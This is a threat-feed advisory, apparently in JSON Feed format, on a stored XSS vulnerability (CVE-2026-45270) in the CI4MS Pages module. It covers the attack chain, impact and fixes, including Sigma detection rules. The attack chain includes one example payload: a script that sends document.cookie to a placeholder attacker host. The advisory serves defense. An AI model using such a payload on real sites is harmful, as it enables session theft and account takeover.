{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/cve-2026-45270/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["ci4-cms-erp/ci4ms (\u003c= 0.31.8.0)"],"_cs_severities":["high"],"_cs_tags":["xss","stored-xss","ci4ms","cve-2026-45270"],"_cs_type":"threat","_cs_vendors":["CodeIgniter"],"content_html":"\u003cp\u003eA stored XSS vulnerability exists within the Pages module of the CI4MS application, specifically affecting versions 0.31.8.0 and earlier. This vulnerability arises from the failure to properly sanitize user-supplied content within the Pages module\u0026rsquo;s backend. The \u003ccode\u003ehtml_purify\u003c/code\u003e validation rule is registered, but the raw, unpurified POST data is directly persisted into the \u003ccode\u003epages_langs.content\u003c/code\u003e database column. The public renderer for pages emits this unsanitized content without proper escaping, leading to XSS. An attacker with content author privileges (\u003ccode\u003epages.create\u003c/code\u003e) can inject arbitrary JavaScript code, which executes when a user, including an administrator, views the affected page. Furthermore, pages can be promoted to the site\u0026rsquo;s home page, broadening the attack surface to all visitors.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker authenticates to the CI4MS backend with \u003ccode\u003epages.create\u003c/code\u003e or \u003ccode\u003epages.update\u003c/code\u003e permissions.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing JavaScript code (e.g., \u003ccode\u003e\u0026lt;script\u0026gt;fetch(\u0026quot;https://attacker.example/?c=\u0026quot;+encodeURIComponent(document.cookie))\u0026lt;/script\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker creates or updates a page via the \u003ccode\u003e/backend/pages/create\u003c/code\u003e or \u003ccode\u003e/backend/pages/update\u003c/code\u003e endpoints, injecting the malicious payload into the \u003ccode\u003elang[en][content]\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eThe application\u0026rsquo;s \u003ccode\u003ePages\u003c/code\u003e controller registers the \u003ccode\u003ehtml_purify\u003c/code\u003e validation rule, but fails to apply the sanitized result to the database.\u003c/li\u003e\n\u003cli\u003eThe raw, unsanitized payload is stored in the \u003ccode\u003epages_langs.content\u003c/code\u003e column in the database.\u003c/li\u003e\n\u003cli\u003eA user visits the public URL of the created page (e.g., \u003ccode\u003e/poc-page-xss\u003c/code\u003e), triggering the \u003ccode\u003eHome::index()\u003c/code\u003e controller.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eHome::index()\u003c/code\u003e controller retrieves the unsanitized content from the database.\u003c/li\u003e\n\u003cli\u003eThe template at \u003ccode\u003eapp/Views/templates/default/pages.php\u003c/code\u003e emits the raw content via \u003ccode\u003e\u0026lt;?php echo $pageInfo-\u0026gt;content ?\u0026gt;\u003c/code\u003e without escaping, causing the JavaScript code to execute in the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an attacker to execute arbitrary JavaScript code in the browser of any visitor to the compromised page. If an administrator visits the page, their session cookie can be exfiltrated, leading to complete account takeover. The attacker requires only \u003ccode\u003epages.create\u003c/code\u003e permissions, which are typically assigned to non-admin content authors, enabling privilege escalation. By setting the malicious page as the home page, the attacker can ensure that every visitor to the site is potentially compromised.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the vendor-provided fix by calling \u003ccode\u003eCustomRules::sanitizeHtml()\u003c/code\u003e before persisting the content in \u003ccode\u003emodules/Pages/Controllers/Pages.php\u003c/code\u003e (see snippet in advisory).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect CI4MS Pages Module Stored XSS Attempt via HTTP POST\u0026rdquo; to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eReview and update other modules using the \u003ccode\u003ehtml_purify\u003c/code\u003e validation rule to ensure proper sanitization.\u003c/li\u003e\n\u003cli\u003eEnable output escaping for fields not intended to contain raw HTML to provide defense-in-depth.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/backend/pages/create\u003c/code\u003e and \u003ccode\u003e/backend/pages/update\u003c/code\u003e with suspicious content in the \u003ccode\u003elang[en][content]\u003c/code\u003e parameter using the Sigma rule \u0026ldquo;Detect CI4MS Pages Module Stored XSS Payload in HTTP POST Data\u0026rdquo;.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-18T16:24:57Z","date_published":"2026-05-18T16:24:57Z","id":"https://feed.craftedsignal.io/briefs/2026-05-ci4ms-stored-xss/","summary":"A stored XSS vulnerability (CVE-2026-45270) exists in the Pages module of CI4MS due to improper sanitization of page content, allowing an attacker with `pages.create` permissions to inject malicious code and escalate privileges if an administrator views the page.","title":"CI4MS Stored XSS Vulnerability in Pages Module","url":"https://feed.craftedsignal.io/briefs/2026-05-ci4ms-stored-xss/"}],"language":"en","title":"CraftedSignal Threat Feed — Cve-2026-45270","version":"https://jsonfeed.org/version/1.1"}